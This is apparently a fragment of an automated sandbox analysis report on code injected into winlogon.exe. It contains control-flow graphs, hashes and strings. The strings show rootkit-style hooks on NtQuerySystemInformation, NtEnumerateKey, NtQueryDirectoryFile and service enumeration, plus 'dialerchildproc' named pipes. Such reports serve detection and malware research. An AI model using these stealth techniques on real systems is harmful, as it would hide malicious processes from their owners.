                                                  • Instruction Fuzzy Hash: 1302A53622DBC4CAEB60CB55E49439EF7A1F784795F104126EA8E87BA9DF78C454CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                  • Instruction ID: 09cf3f19013970cc5edba0ff51850c5c12277f20bdc89c750177569444b008a5
                                                  • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                  • Instruction Fuzzy Hash: BC31F13222DAC4C9EA70DA15E45539EF6E4FB88785F200536E9CD46BA9DF7CC5409B04

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction ID: d7f8704d464420a2ce37a06b3bc325ee32576ad6341c0f5012ed89367f689b04
                                                  • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction Fuzzy Hash: 431180306386C1CAFB60EB62F9493DEF2D4AF54346F94413F9D0E81595EF79D4449600

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                  • Instruction ID: 22019e5aebe169b3d70db300553c4eca4bdb0326af0d5ecbc3d97933e7c21ec8
                                                  • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                  • Instruction Fuzzy Hash: 50F0BD76228A84C5D6309B45E45179EFBA1EB88BE5F144126BE8D47B69CE38C5908B40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 265 1e85898273c-1e8589827a4 call 1e8589829d4 * 4 274 1e8589829b2 265->274 275 1e8589827aa-1e8589827ad 265->275 277 1e8589829b4-1e8589829d0 274->277 275->274 276 1e8589827b3-1e8589827b6 275->276 276->274 278 1e8589827bc-1e8589827bf 276->278 278->274 279 1e8589827c5-1e8589827e6 VirtualAlloc 278->279 279->274 280 1e8589827ec-1e85898280c 279->280 281 1e858982838-1e85898283f 280->281 282 1e85898280e-1e858982836 280->282 283 1e858982845-1e858982852 281->283 284 1e8589828df-1e8589828e6 281->284 282->281 282->282 283->284 287 1e858982858-1e85898286a LoadLibraryA 283->287 285 1e858982992-1e8589829b0 284->285 286 1e8589828ec-1e858982901 284->286 285->277 286->285 288 1e858982907 286->288 289 1e8589828ca-1e8589828d2 287->289 290 1e85898286c-1e858982878 287->290 294 1e85898290d-1e858982921 288->294 289->287 292 1e8589828d4-1e8589828d9 289->292 291 1e8589828c5-1e8589828c8 290->291 291->289 295 1e85898287a-1e85898287d 291->295 292->284 296 1e858982982-1e85898298c 294->296 297 1e858982923-1e858982934 294->297 298 1e8589828a7-1e8589828b7 295->298 299 1e85898287f-1e8589828a5 295->299 296->285 296->294 301 1e858982936-1e85898293d 297->301 302 1e85898293f-1e858982943 297->302 305 1e8589828ba-1e8589828c1 298->305 299->305 306 1e858982970-1e858982980 301->306 303 1e858982945-1e85898294b 302->303 304 1e85898294d-1e858982951 302->304 303->306 307 1e858982963-1e858982967 304->307 308 1e858982953-1e858982961 304->308 305->291 306->296 306->297 307->306 310 1e858982969-1e85898296c 307->310 308->306 310->306
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AllocLibraryLoadVirtual
                                                  • String ID:
                                                  • API String ID: 3550616410-0
                                                  • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction ID: 54f6f79a6e3174aa67926fcea571029873fefd45f025aae229484734b2b22b08
                                                  • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction Fuzzy Hash: B461DD32B21692CBDB548F95D2007ADF3A2FB54BA4F588136DE5E07788DE39D852CB00

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001E8589B1628: GetProcessHeap.KERNEL32 ref: 000001E8589B1633
                                                    • Part of subcall function 000001E8589B1628: HeapAlloc.KERNEL32 ref: 000001E8589B1642
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16B2
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16DF
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B16F9
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1719
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1734
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1754
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B176F
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B178F
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17AA
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17CA
                                                  • Sleep.KERNEL32 ref: 000001E8589B1AD7
                                                  • SleepEx.KERNELBASE ref: 000001E8589B1ADD
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17E5
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1805
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1820
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1840
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B185B
                                                    • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B187B
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1896
                                                    • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B18A0
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$HeapSleep$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1534210851-0
                                                  • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction ID: 06e8169f9804a98201475c8f763f238f1302acfb2d082d9a4a6838d138c42db4
                                                  • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction Fuzzy Hash: 9C31F9712296D5CAEB54BB66DA453FDB3A8AF84BC2F1454339E0D8729AFE20C8518210

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 575 1e8589b2b2c-1e8589b2ba5 call 1e8589d2ce0 578 1e8589b2ee0-1e8589b2f03 575->578 579 1e8589b2bab-1e8589b2bb1 575->579 579->578 580 1e8589b2bb7-1e8589b2bba 579->580 580->578 581 1e8589b2bc0-1e8589b2bc3 580->581 581->578 582 1e8589b2bc9-1e8589b2bd9 GetModuleHandleA 581->582 583 1e8589b2bdb-1e8589b2beb call 1e8589c6090 582->583 584 1e8589b2bed 582->584 586 1e8589b2bf0-1e8589b2c0e 583->586 584->586 586->578 589 1e8589b2c14-1e8589b2c33 StrCmpNIW 586->589 589->578 590 1e8589b2c39-1e8589b2c3d 589->590 590->578 591 1e8589b2c43-1e8589b2c4d 590->591 591->578 592 1e8589b2c53-1e8589b2c5a 591->592 592->578 593 1e8589b2c60-1e8589b2c73 592->593 594 1e8589b2c83 593->594 595 1e8589b2c75-1e8589b2c81 593->595 596 1e8589b2c86-1e8589b2c8a 594->596 595->596 597 1e8589b2c9a 596->597 598 1e8589b2c8c-1e8589b2c98 596->598 599 1e8589b2c9d-1e8589b2ca7 597->599 598->599 600 1e8589b2d9d-1e8589b2da1 599->600 601 1e8589b2cad-1e8589b2cb0 599->601 602 1e8589b2ed2-1e8589b2eda 600->602 603 1e8589b2da7-1e8589b2daa 600->603 604 1e8589b2cc2-1e8589b2ccc 601->604 605 1e8589b2cb2-1e8589b2cbf call 1e8589b199c 601->605 602->578 602->593 608 1e8589b2dbb-1e8589b2dc5 603->608 609 1e8589b2dac-1e8589b2db8 call 1e8589b199c 603->609 606 1e8589b2d00-1e8589b2d0a 604->606 607 1e8589b2cce-1e8589b2cdb 604->607 605->604 612 1e8589b2d3a-1e8589b2d3d 606->612 613 1e8589b2d0c-1e8589b2d19 606->613 607->606 611 1e8589b2cdd-1e8589b2cea 607->611 615 1e8589b2dc7-1e8589b2dd4 608->615 616 1e8589b2df5-1e8589b2df8 608->616 609->608 620 1e8589b2ced-1e8589b2cf3 611->620 622 1e8589b2d4b-1e8589b2d58 lstrlenW 612->622 623 1e8589b2d3f-1e8589b2d49 call 1e8589b1bbc 612->623 613->612 621 1e8589b2d1b-1e8589b2d28 613->621 615->616 625 1e8589b2dd6-1e8589b2de3 615->625 618 1e8589b2e05-1e8589b2e12 lstrlenW 616->618 619 1e8589b2dfa-1e8589b2e03 call 1e8589b1bbc 616->619 629 1e8589b2e35-1e8589b2e3f call 1e8589b3844 618->629 630 1e8589b2e14-1e8589b2e1e 618->630 619->618 644 1e8589b2e4a-1e8589b2e55 619->644 627 1e8589b2d93-1e8589b2d98 620->627 628 1e8589b2cf9-1e8589b2cfe 620->628 631 1e8589b2d2b-1e8589b2d31 621->631 633 1e8589b2d7b-1e8589b2d8d call 1e8589b3844 622->633 634 1e8589b2d5a-1e8589b2d64 622->634 623->622 623->627 635 1e8589b2de6-1e8589b2dec 625->635 638 1e8589b2e42-1e8589b2e44 627->638 628->606 628->620 629->638 630->629 639 1e8589b2e20-1e8589b2e33 call 1e8589b152c 630->639 631->627 640 1e8589b2d33-1e8589b2d38 631->640 633->627 633->638 634->633 643 1e8589b2d66-1e8589b2d79 call 1e8589b152c 634->643 635->644 645 1e8589b2dee-1e8589b2df3 635->645 638->602 638->644 639->629 639->644 640->612 640->631 643->627 643->633 650 1e8589b2e57-1e8589b2e5b 644->650 651 1e8589b2ecc-1e8589b2ed0 644->651 645->616 645->635 654 1e8589b2e63-1e8589b2e7d call 1e8589b85c0 650->654 655 1e8589b2e5d-1e8589b2e61 650->655 651->602 656 1e8589b2e80-1e8589b2e83 654->656 655->654 655->656 659 1e8589b2ea6-1e8589b2ea9 656->659 660 1e8589b2e85-1e8589b2ea3 call 1e8589b85c0 656->660 659->651 662 1e8589b2eab-1e8589b2ec9 call 1e8589b85c0 659->662 660->659 662->651
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction ID: 66d3cc7fa703628ffd88a958204c6c3eae92163f900264158483d38a9f943711
                                                  • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction Fuzzy Hash: 31B14732228AD0CAEBA59FA6D8507EDF3A5FB84B86F445027EE0D57B94DE75C840C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction ID: d4e1efc638050b926f9574cf9333cc024f10501de906563db633245b72e59a7c
                                                  • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction Fuzzy Hash: 6C313B76229BC0DAEB609F60E8807EDB764FB84745F44452ADE4E57B98EF38C648C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction ID: fe4fedf686d99ec42a62814e82a9535f6f48c61b48166fa88bd6cf84dd123d16
                                                  • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction Fuzzy Hash: D4314E36224BC0DAEB649F25E8403EEB7A4FB89755F50012AEE9D53B55DF38C545CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction ID: c7e4212cc5d13ccfdc5b6c4001ea65b39e9a5bd1eb85d2e12a93a934f0025c5e
                                                  • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction Fuzzy Hash: 83512B76224BC4CAEB55DF62E54439EBBA1FB89B96F04413ADE4907758DF39C0458700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                  • API String ID: 4175298099-1975688563
                                                  • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction ID: 307e4caf8f773ededbd49a1d779e4008e5bf6fc61e17ee7f67eba446ce0af824
                                                  • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction Fuzzy Hash: B131A274535ACAE4EA05EFA5EC527ECF720FF84346F8040739C1D125669F79864AC750

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 417 1e858986910-1e858986916 418 1e858986951-1e85898695b 417->418 419 1e858986918-1e85898691b 417->419 422 1e858986a78-1e858986a8d 418->422 420 1e858986945-1e858986984 call 1e858986fc0 419->420 421 1e85898691d-1e858986920 419->421 437 1e858986a52 420->437 438 1e85898698a-1e85898699f call 1e858986e54 420->438 423 1e858986922-1e858986925 421->423 424 1e858986938 __scrt_dllmain_crt_thread_attach 421->424 425 1e858986a9c-1e858986ab6 call 1e858986e54 422->425 426 1e858986a8f 422->426 429 1e858986931-1e858986936 call 1e858986f04 423->429 430 1e858986927-1e858986930 423->430 433 1e85898693d-1e858986944 424->433 440 1e858986ab8-1e858986aed call 1e858986f7c call 1e858986e1c call 1e858987318 call 1e858987130 call 1e858987154 call 1e858986fac 425->440 441 1e858986aef-1e858986b20 call 1e858987190 425->441 431 1e858986a91-1e858986a9b 426->431 429->433 442 1e858986a54-1e858986a69 437->442 449 1e8589869a5-1e8589869b6 call 1e858986ec4 438->449 450 1e858986a6a-1e858986a77 call 1e858987190 438->450 440->431 451 1e858986b31-1e858986b37 441->451 452 1e858986b22-1e858986b28 441->452 470 1e858986a07-1e858986a11 call 1e858987130 449->470 471 1e8589869b8-1e8589869dc call 1e8589872dc call 1e858986e0c call 1e858986e38 call 1e85898ac0c 449->471 450->422 458 1e858986b39-1e858986b43 451->458 459 1e858986b7e-1e858986b94 call 1e85898268c 451->459 452->451 457 1e858986b2a-1e858986b2c 452->457 466 1e858986c1f-1e858986c2c 457->466 460 1e858986b45-1e858986b4d 458->460 461 1e858986b4f-1e858986b5d call 1e858995780 458->461 478 1e858986b96-1e858986b98 459->478 479 1e858986bcc-1e858986bce 459->479 467 1e858986b63-1e858986b78 call 1e858986910 460->467 461->467 482 1e858986c15-1e858986c1d 461->482 467->459 467->482 470->437 490 1e858986a13-1e858986a1f call 1e858987180 470->490 471->470 519 1e8589869de-1e8589869e5 __scrt_dllmain_after_initialize_c 471->519 478->479 487 1e858986b9a-1e858986bbc call 1e85898268c call 1e858986a78 478->487 480 1e858986bd0-1e858986bd3 479->480 481 1e858986bd5-1e858986bea call 1e858986910 479->481 480->481 480->482 481->482 499 1e858986bec-1e858986bf6 481->499 482->466 487->479 511 1e858986bbe-1e858986bc6 call 1e858995780 487->511 507 1e858986a21-1e858986a2b call 1e858987098 490->507 508 1e858986a45-1e858986a50 490->508 504 1e858986c01-1e858986c11 call 1e858995780 499->504 505 1e858986bf8-1e858986bff 499->505 504->482 505->482 507->508 520 1e858986a2d-1e858986a3b 507->520 508->442 511->479 519->470 521 1e8589869e7-1e858986a04 call 1e85898abc8 519->521 520->508 521->470
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                  • API String ID: 190073905-1786718095
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 2273416eda205a835de9ccd1b838d3f7d5380a1bbd2954953cf4568a5117860d
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: D6819F317342C3CAFA929B65D8493DEF291AF85780F5480379E4D8B796DF39C9458B00

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 000001E8589BCE37
                                                  • FlsGetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE4C
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE6D
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE9A
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEAB
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEBC
                                                  • SetLastError.KERNEL32 ref: 000001E8589BCED7
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF0D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,000001E8589BECCC,?,?,?,?,000001E8589BBF9F,?,?,?,?,?,000001E8589B7AB0), ref: 000001E8589BCF2C
                                                    • Part of subcall function 000001E8589BD6CC: HeapAlloc.KERNEL32 ref: 000001E8589BD721
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF54
                                                    • Part of subcall function 000001E8589BD744: HeapFree.KERNEL32 ref: 000001E8589BD75A
                                                    • Part of subcall function 000001E8589BD744: GetLastError.KERNEL32 ref: 000001E8589BD764
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF65
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF76
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction ID: 3c490d6acf1992e320168de973d9926605ee64eeb61e54e48ecf7625888e2c93
                                                  • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction Fuzzy Hash: A4416D312292C4CEFA68B771D5953FDF2425F857BAF14477BAC3E076E6DE2888018640
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                  • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2171963597-1373409510
                                                  • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction ID: 1b119e999e0377ff32fa6a01d0b90dd197b3e79e90bf9ddc32d83b8a008cc649
                                                  • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction Fuzzy Hash: BB211036624680C6F710DB25F4443ADB7A1FB85BA5F504226DE5E02AA8DF7DC549CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction ID: 482f2ed3bbf1a5d302b22c37c74437017ab2248bb16c1b938e4fd7d10152e2c4
                                                  • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction Fuzzy Hash: B6E17E72624B82CAEB60DF65D4813DDB7A4FB55B98F100126EE8E57B9ACF34C491CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction ID: 456ede5cd129e004dcad9625f83eba4cfeb6527c6b4e1311171347c7d4774ba3
                                                  • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction Fuzzy Hash: 87E15972A29B84CAEB609F69D4803DDB7E0FB55B99F100126EE8D57B9ADF34C481C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction ID: efdaad13b162fecd45176c1601fdd0d5fce348f0f9cb4d74c0640e0fd08a9e7f
                                                  • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction Fuzzy Hash: A241B032339A80D9FA16DB66E8187DDB392BF49BA1F09413B9D0E97785EE38C4458350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction ID: b1163f3ad4a2c33dc659d8962ce8299cd05609ddf549d15265609a563b1be8b4
                                                  • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction Fuzzy Hash: E2416F73224BC4CAE760DF61E44439EB7A1F789B99F04812ADE8907758DF39C485CB00
                                                  APIs
